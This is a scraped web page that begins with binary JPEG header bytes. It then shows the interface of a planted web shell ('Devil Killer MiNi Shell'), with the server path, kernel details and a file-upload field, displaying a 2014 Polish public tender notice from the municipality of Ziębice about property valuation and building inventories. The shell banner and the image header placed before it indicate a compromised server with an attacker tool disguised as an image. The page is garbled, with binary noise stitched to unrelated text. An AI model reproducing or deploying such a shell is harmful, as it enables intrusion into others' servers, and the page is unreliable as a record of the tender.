JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/94263-N-2014.html

<p class="kh_header"><b>Ziębice: Świadczenie usług ustalania wartości nieruchomości i wykonania inwentaryzacji budynków na terenie miasta i gminy Ziębice.</b><br>
<b>Numer ogłoszenia: 94263 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ziębice , ul. Przemysłowa 10, 57-220 Ziębice, woj. dolnośląskie, tel. 074 8163870, faks 074 8191212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ziebice.biuletyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ustalania wartości nieruchomości i wykonania inwentaryzacji budynków na terenie miasta i gminy Ziębice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Ustalanie wartości nieruchomości:
1)	nieruchomości  lokalowych:
a)	mieszkalne z pomieszczeniami przynależnymi i udziałem w gruncie - 40 szt 
b)	użytkowe z pomieszczeniami   przynależnymi i udziałem w gruncie - 5 szt 
2)	budynków mieszkalnych z pomieszczeniami przynależnymi i gruntem:
a)	jednej kondygnacji - 4 szt
b)	do trzech kondygnacji -2 szt
3)	budynków niemieszkalnych z gruntem:
a)	jednej kondygnacji -10 szt
b)	do trzech kondygnacji - 2 szt
4)	działek gruntowych niezabudowanych:
a)	pod zabudowę mieszkaniową - 7 szt 
b)	na cele rolne i na cele inne niż mieszkaniowe - 23 szt 
5)	udział w nieruchomości zabudowanej (budynek mieszkalny z budynkami gospodarczymi oraz grunt) -3 szt 
6)	działek gruntowych, które zostaną wniesione przez Gminę jako wkład niepieniężny (aport) do spółki - 1 szt 
7)	ustalenie    wartości    pomieszczeń   przynależnych   wyłączonych    z    części    wspólnej nieruchomości  do  celu   dokonania   w   umowie  nowego  ustalenia  wysokości udziałów w nieruchomości  wspólnej  -5 szt 
8)	do ustalania opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności - 5 szt
9)	nasadzenia -3 szt 
10)	ustalanie    wartości    nakładów    na    remont    dokonanych    przez    najemcę   za  zgodą wynajmującego   w   okresie  5 lat   przed   dniem   złożenia   wniosku   o  kupno   lokalu/ budynku, a  obciążających   wynajmującego - 20 szt
11)	ustalenie wartości nieruchomości dla potrzeb naliczenia opłaty z tytułu przekazania w trwały zarząd:
a)	działka gruntowa niezabudowana - 20 szt.
b)	działka gruntowa zabudowana -  1 szt. 
c)	działki gruntowe - boiska sportowe na terenie wiejskim - 22 szt.
12)	ustalenie wartości nieruchomości dla potrzeb komunalizacji - 1 szt.
13)	ustalenie   wartości   początkowej   środków   trwałych   zgodnie   z   art. 28  ust. 1  pkt. 1 ustawy  z   dnia   29.09.1994   roku  o   rachunkowości   dla   nieruchomości   nabytych   przez Gminę  z   mocy   prawa   na    podstawie   decyzji   komunalizacyjnych  wydanych  w   latach 1991-1993:
a)	nieruchomości zabudowane ( działki gruntowe z jednokondygnacyjnymi budynkami świetlic wiejskich, remiz OSP) - 14 szt.
b)	udział w nieruchomości zabudowanej ( działka gruntowa z dwukondygnacyjnym budynkiem, w którym znajduje się  świetlica  wiejska) - 1 szt.
c)	lokale użytkowe (świetlice) z udziałem w nieruchomości wspólnej - 3 szt.
d)	nieruchomości zabudowane (działki gruntowe z fragmentami zabytkowych miejskich murów obronnych)- 9 szt.
e)	nieruchomość zabudowana (działka gruntowa z zabytkową Bramą Paczkowską) - 1 szt.
f)	nieruchomość niezabudowana działka nr 459/1 w Ziębicach, obręb: Wschód (składowisko odpadów)  -  1  szt.
g)	nieruchomość  zabudowana  (działka  gruntowa  nr 258  w  Ziębicach,  obręb: Wschód z  ogrodzeniem i  kaplicą   pogrzebową  -  cmentarz  komunalny) - szt. 1
14)	ustalenie    wartości    nieruchomości    przy    uwzględnieniu    przeznaczenia    terenu obowiązującego  przed   zmianą   planu   oraz  przy  uwzględnieniu   przeznaczenia  terenu  obowiązującego    po   uchwaleniu   miejscowego  planu zagospodarowania przestrzennego dla    potrzeb  ustalenia   wysokości  odszkodowania   z  tytułu  obniżenia   wartości  nieruchomości  lub ustalenia wysokości opłaty tytułu wzrostu wartości nieruchomości ( art. 36  i  37 ustawy z   27.03.2003 roku  o  planowaniu  i  zagospodarowaniu   przestrzennym)- 5 szt 
15)	ustalenie wartości nieruchomości - działki gruntowej nr 333/2 niezabudowanej przeznaczonej na budowę parkingu w Wadochowicach - 1 szt.

2.	Wykonanie  inwentaryzacji  budynków:
1)	lokali mieszkalnych  i użytkowych  w budynkach - 60 szt
2)	budynków mieszkalnych i użytkowych o jednej kondygnacji - 26 szt
3)	budynków mieszkalnych i użytkowych do trzech kondygnacji  - 4 szt
4)	pomieszczeń przynależnych - 40 szt
5)	ustalenie udziałów w budynkach  mieszkalnych, użytkowych, gospodarczych - 20 szt
6)	sporządzenie aneksu do inwentaryzacji - 6 szt

3.	W ramach usługi ustalania wartości nieruchomości Wykonawca:
1)	Sporządza pisemne zawiadomienie ( za potwierdzeniem odbioru) przyszłego nabywcy lokalu, budynku/ działki gruntowej o terminie wizyty oraz przeprowadzenie oględzin nieruchomości podlegającej wycenie, w terminie do 30 dni od dnia doręczenia Wykonawcy odrębnego zlecenia,
2)	Sporządza operat szacunkowy wyceny nieruchomości zawierający wartość łączną i w rozbiciu  gruntu i/lub budynku/lokalu w dwóch egzemplarzach operatu  oraz jednego egzemplarza wyciągu z operatu  ze szkicem lokalu   i pomieszczeń przynależnych w terminie do 60 dni  od dnia ustalonego  w pisemnym zawiadomieniu, o którym mowa w punkcie 1  jako termin przeprowadzenia oględzin nieruchomości wraz z:
a)	zdjęciem wycenianej nieruchomości,
b)	protokołem z oględzin nieruchomości,
c)	notatką z badania zapisów księgi wieczystej,
d)	kopią wypisu i wyrysu z ewidencji gruntów,
1)	zawiadamia pisemnie Wydział Gospodarki Nieruchomościami i Rolnictwa Urzędu Miejskiego w Ziębicach o braku możliwości dokonania oględzin nieruchomości podlegającej wycenie z podaniem przyczyny, niezwłocznie  po zaistnieniu takiej sytuacji,
2)	składa na żądanie Zamawiającego pisemne wyjaśnienia w zakresie dotyczącym wykonanego operatu szacunkowego,
3)	występuje przed Samorządowym Kolegium Odwoławczym, sądem powszechnym oraz  uczestniczenie w naradach, rozprawach administracyjnych z udziałem stron toczących się postępowań w sprawach, w których Wykonawca wykonał operat szacunkowy,
4)	potwierdza w okresie 12-stu miesięcy od sporządzenia operatu szacunkowego  na żądanie Zamawiającego aktualności operatu szacunkowego zgodnie z postanowieniami art. 156 ust. 4 ustawy o gospodarce nieruchomościami oraz rozporządzenia Rady Ministrów w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego w ramach wynagrodzenia należnego za wykonanie operatu szacunkowego, zgodnie z ofertą Wykonawcy, przy czym ilość potwierdzeń aktualności nie może dotyczyć  więcej  niż 10-ciu  operatów.

4.	W ramach usługi wykonania inwentaryzacji budynków Wykonawca:
1)	pisemnie zawiadamia (za potwierdzeniem odbioru) najemców/właścicieli lokali/budynków o terminach wizyt Wykonawcy  celem wykonania pomiarów podlegających opracowaniom inwentaryzacyjnym,  w terminie do 14 dni od dnia doręczenia Wykonawcy odrębnego zlecenia,
2)	sporządza projekt inwentaryzacyjny zawierający opracowania odpowiednio, o których mowa w pkt 3) lit. a) i b)  i przekazanie do administratora budynku (ZUK  Sp. z o.o. w Ziębicach lub Urzędu Miejskiego w Ziębicach) celem potwierdzenia jego prawidłowości i zgodności ze stanem faktycznym, w terminie do 30 dni od dnia przeprowadzenia pomiarów inwentaryzacyjnych,
3)	sporządza dwa egzemplarze opracowań inwentaryzacyjnych,  w terminie do 14 dni od dnia   otrzymania   od   administratora budynku    pisemnego    potwierdzenia,  o  którym   mowa w niniejszym punkcie 2) zawierające w szczególności:
a)	opracowania inwentaryzacyjne budynków składające się z:
-rzutów kondygnacji i szkiców niezbędnych do uzyskania zaświadczenia o samodzielności lokali wraz  z zestawieniem powierzchni mieszkalnej, użytkowej potwierdzone podpisem osoby uprawnionej oraz szkice pomieszczeń przynależnych, 
- określenia udziału w nieruchomości wspólnej dla wszystkich lokali położonych        w budynku. 
b)	opracowania inwentaryzacyjne budynków gospodarczych /komórek/składające się z:
-rzutów kondygnacji i szkiców pomieszczeń  wraz z zestawieniem powierzchni użytkowej potwierdzone podpisem osoby uprawnionej oraz  określenie udziału w budynku dla wszystkich pomieszczeń w nim położonych.
4)	Pisemnie zawiadamia Wydział Gospodarki Nieruchomościami i Rolnictwa Urzędu Miejskiego w Ziębicach o braku możliwości wykonania pomiarów podlegających opracowaniom inwentaryzacyjnym z podaniem przyczyny, niezwłocznie po zaistnieniu takiej sytuacji.
5.	Podane   wyżej   ilości   są   wskazane  jako  maksymalne (docelowe). W trakcie realizacji przedmiotu zamówienia  w  zależności  od  potrzeb  Zamawiającego  wykazane  ilości  mogą  ulec zmianie, w tym zmniejszeniu  przy  zachowaniu  kwoty  zaplanowanej  w  budżecie  Gminy Ziębice na realizację tego   zamówienia.  Z tego  tytułu nie przysługuje  Wykonawcy roszczenie względem Zamawiającego.
6.	Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia w trybie i w sposób określony przepisami obowiązującego w danym zakresie prawa oraz obowiązującymi normami i standardami zawodowymi, ze szczególną starannością właściwą dla zawodowego charakteru tych czynności oraz zasadami etyki zawodowej, kierując się zasadą bezstronności.
7.	Wykonawca obowiązany będzie do  wykonywania zleconych usług zgodnie z przepisami ustawy  z dnia  29 sierpnia 1997 roku   o ochronie danych osobowych  (tekst jedn. Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.).
8.	Zamawiający może odmówić odbioru opracowania operatu szacunkowego i opracowania inwentaryzacyjnego wykonanego wadliwie i w takim przypadku jest uprawniony do żądania wykonania przez Wykonawcę tych opracowań wolnych od wad, nieprawidłowości, w wyznaczonym terminie.
9.	Koszty usunięcia wad, nieprawidłowości ponosi Wykonawca.

SPOSÓB   ZLECANIA   WYKONANIA   USŁUG 
						
1.	Przedmiot umowy będzie realizowany na podstawie odrębnych zleceń, zgodnie  z przedmiotem umowy określonym w § 1, w okresie od dnia podpisania umowy   do dnia 31 grudnia 2014 roku, jednakże nie dłużej niż do wykorzystania maksymalnej wartości brutto, o której mowa   w §  3 ust. 4  umowy.
2.	Usługi  będą zlecane sukcesywnie w miarę bieżących potrzeb Zamawiającego, na podstawie szczegółowego zakresu określonego w odrębnym zleceniu. 
3.	Strony mogą określić krótszy termin wykonania usługi odrębnego zlecenia niż termin określony odpowiednio w § 1ust. 3 i 4 umowy. Termin wykonania usługi odrębnego zlecenia nie może przekroczyć terminu obowiązywania umowy, tj. 31 grudnia 2014 roku 
4.	Zlecenia, na podstawie, których nie zostaną wykonane zlecone czynności w terminie do dnia  31 grudnia 2014 roku zostaną wycofane przez Zamawiającego w formie pisemnej niezwłocznie po wygaśnięciu umowy bez prawa do wynagrodzenia za częściowo wykonane przez Wykonawcę czynności wynikające ze zlecenia.
5.	Dniem wykonania usług jest dzień przekazania Zamawiającemu przez Wykonawcę kompletnej dokumentacji, określonych odpowiednio w § 1 ust. 3 i 4  umowy.   

Ewentualne podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. 2013 r., poz. 907 z późn. zm.),  a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego i funkcjonalnego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające mogą zostać udzielone na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki na podstawie art. 67 ust 1 pkt 6 ustawy Pzp. zamówienia uzupełniające mogą zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usługi szacowania nieruchomości gruntowych zabudowanych lub/i niezabudowanych o łącznej wartości nie mniejszej niż  30 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże:
-  iż dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518).

- złoży oświadczenie, iż osoba które będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający określa, że usługi, których dotyczy obowiązek wykazania przez wykonawcę w wykazie i złożenie dla nich poświadczeń, dotyczy: 
co najmniej 3 usług szacowania nieruchomości gruntowych zabudowanych lub/i niezabudowanych o łącznej wartości nie mniejszej niż  30 000 zł brutto 
Zamawiający nie wymaga informacji o usługach niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie    do reprezentowania,  o ile ofertę składa pełnomocnik,
2)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia,    w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Pisemne zobowiązanie innych podmiotów należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem na zał. 8 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1)	w przypadku urzędowej zmiany stawki podatku od towarów i usług VAT. Należny podatek VAT naliczony zostanie od ceny netto w fakturze  wg.  stawki zgodnej  z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który    w dniu podpisania umowy nie był płatnikiem VAT,  obowiązkiem podatkowym w zakresie tego podatku.
2)	Zmiany w zakresie podwykonawcy, na którego zasoby powoływał się Wykonawca                    na zasadach określonych w art. 26 ust 2b ustawy Pzp. 
a)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je  w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
3)	Zmiana podwykonawcy w przypadkach innych niż określone w pkt 2
a)	zmiana polegająca na wskazaniu innych Podwykonawców
b)	zmiana w zakresie rezygnacji  z Podwykonawców 
c)	zmiana polegająca na wskazaniu innego zakresu (części) Podwykonawstwa
d)	zmiana polegająca na wykonaniu zamówienia przy pomocy Podwykonawców pomimo niewskazania w ofercie żadnej części zamówienia przeznaczonej  do wykonania w ramach Podwykonawstwa 
